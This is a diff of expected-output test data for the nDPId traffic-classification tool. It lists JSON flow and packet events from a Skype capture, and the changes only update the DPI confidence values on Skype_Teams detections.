{"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1431969683445,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969683445,"pkt":"0NQSxnP1PBXCt3IOCABFAABLbZEAAEARiZ3AqAEiwKgBAeQAADUAN6zvm+wBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAAcAAE="} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1050,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjFBAAEAGzLvAqAEinTeCqsOWnFJsNFWpAAAAALAC\/\/\/KJgAAAgQFtAEDAwUBAQgKPiMrQAAAAAAEAgAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAAAygKMAAEARGILAqAEinTeClDLdnFMAHuO+nHICw5e0uFvnoh7r2z7q0Ash9G6vuA=="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1052,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA37XsAAEAR+hLAqAEinTg0JTLdnGAAI2eBnHQCCWFRyRLVPOTLcRjYZLb3DOT1DUSOmuDR"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1052,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1052,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1nZ0AAEARXdnAqAEib91NmjLdnFEAIcopnHYCxd71ZoU+BTO6L2LN9kiyomjWgPGl4A=="} 
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1431969683623,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969683623,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhCdN4KqwKgBIpxSw5bt8UdnbDRVqqASOJAWbAAAAgQFrAQCCApOqggfPiMrQAEDAwk="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1431969683623,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969683623,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bWZAAEAG67HAqAEinTeCqsOWnFJsNFWq7fFHaIAQECxtGQAAAQEICj4jK71Oqggf"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1431969684467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969684467,"pkt":"0NQSxnP1PBXCt3IOCABFAAA16v8AAEARrgrAqAEinTeCrDLdnFMAIRT0nHgCu2bzH4JB7obGwPAa3nMCpmcjtPyNNg=="} 
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1070,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1070,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1431969684467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969684467,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8hr8AAEAReCLAqAEib91KKDLdnFIAKIqNnHoCPuiFRI7wAmsXvw\/hsEg3lYrpYaj71nbGjF\/D9YI="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1072,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":2,"flow_last_seen":1431969684539,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969684539,"pkt":"0NQSxnP1PBXCt3IOCABFAABLqeAAAEARTU7AqAEiwKgBAdRHADUAN3UY\/nwBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1073,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":2,"flow_last_seen":1431969684539,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969684539,"pkt":"0NQSxnP1PBXCt3IOCABFAABLQlQAAEARtNrAqAEiwKgBAeQAADUAN6zvm+wBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAAcAAE="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685111,"flow_last_seen":1431969685111,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969685111,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -635,40 +635,40 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":3,"flow_last_seen":1431969685234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969685234,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0w75AAEAGlVnAqAEinTeCqsOYAbvnclCkz\/tu9oAQECyACwAAAQEICj4jMf1Oqgmy"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1431969685483,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969685483,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9kPYAAEARbgbAqAEib91KDDLdnF8AKfx\/nHwCoMStpaQYl8DnkwYEqqAF9FXdbHxKRUYHrOVyJRT4"} 
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1094,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1094,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1431969685483,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969685483,"pkt":"0NQSxnP1PBXCt3IOCABFAABAc7wAAEARJVPAqAEinTeCnDLdnGIALEvBnH4CZ\/Wwkka3Pn+XJ2UB3JhFKbNG53SJ0IkPRrwOiZA6M572"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1094,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1094,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969685484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1431969685484,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969685484,"pkt":"0NQSxnP1PBXCt3IOCABFAAA72\/8AAEARIuzAqAEib91KHzLdnFUAJxsjnIACakgRW6zNH9umAy\/xnD4EBConFfeCu32RWyeo5A=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1095,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969685484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
